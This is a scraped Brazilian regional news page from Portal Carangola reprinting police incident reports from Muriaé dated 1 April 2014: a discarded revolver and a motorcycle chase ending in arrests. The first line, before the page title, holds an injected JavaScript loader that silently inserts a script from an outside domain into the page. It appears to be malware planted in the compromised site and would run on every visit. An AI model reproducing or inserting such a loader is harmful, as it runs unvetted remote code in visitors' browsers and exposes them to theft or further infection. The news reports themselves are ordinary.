;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais em destaque - 01/04/2014. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais em destaque – 01/04/2014.

pmbn

OCORRÊNCIAS DE DESTAQUE   MURIAÉ 01/04/2014

 PRINCIPAIS REGISTROS DE OCORRÊNCIAS

                     MURIAÉ – ARMA DE FOGO LOCALIZADA PRÓXIMA A UMA BICA D’ÁGUA

             Em 01/04/14, às 17h58min, na Vila Santa Rita, S/Nº, Bairro União militares em patrulhamento pela Rua Narciso Dias Rabelo, foram informados a respeito de um indivíduo transitava em uma bicicleta e ao avistar a viatura policial, dispensou algo próximo a um matagal. Então deslocaram até o local conhecido como “BICA D’AGUA” e localizaram um REVÓLVER sem identificação, aparentando ser cal.22 desmuniciado. Suspeito não localizado.

             MURIAÉ – PORTE ILEGAL ARMA DE FOGO/ACESSÓRIO/MUNIÇÃO DE USO PERMITIDO (REDS 2014-007141478-001)

             Em 02/04/14, às 00h59min, na Rua Sebastião Potássio, José Cirilo, militares em patrulhamento pelo local, nas imediações do bairro José Cirilo, avistaram uma motocicleta com dois ocupantes que ao perceberem a presença da guarnição de policiais evadiram tomando rumo a Rua Sebastião Potássio, e o condutor não obedeceu as ordens de parada e continuou sua fuga colocando em risco os demais veículos e pedestres da rua, contudo foi alcançado e os ocupantes submetidos a busca pessoal, tendo sido encontrado na cintura de D. L. D. O.A. M., 16 anos, uma Garrucha na cor preta, municiada com dois cartuchos intactos, e com L. D. S. O., 19 anos, foi encontrado um aparelho celular de procedência duvidosa, a quantia de R$15,00, e localizado no chão próximo a L. uma bucha de substância análoga a maconha. Pelo exposto foi dado voz de apreensão ao infrator D. por posse ilegal de arma de fogo, bem como dado voz de prisão ao autor L. por direção perigosa. O veículo está com a documentação em dia, contudo o condutor é inabilitado, assim sendo a motocicleta cor preta, apreendida e recolhida ao pátio credenciado. O autor L., também foi preso dia 13/03/2014, por porte ilegal de arma.

ASSESSOERIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47º BPM

 RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3255

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.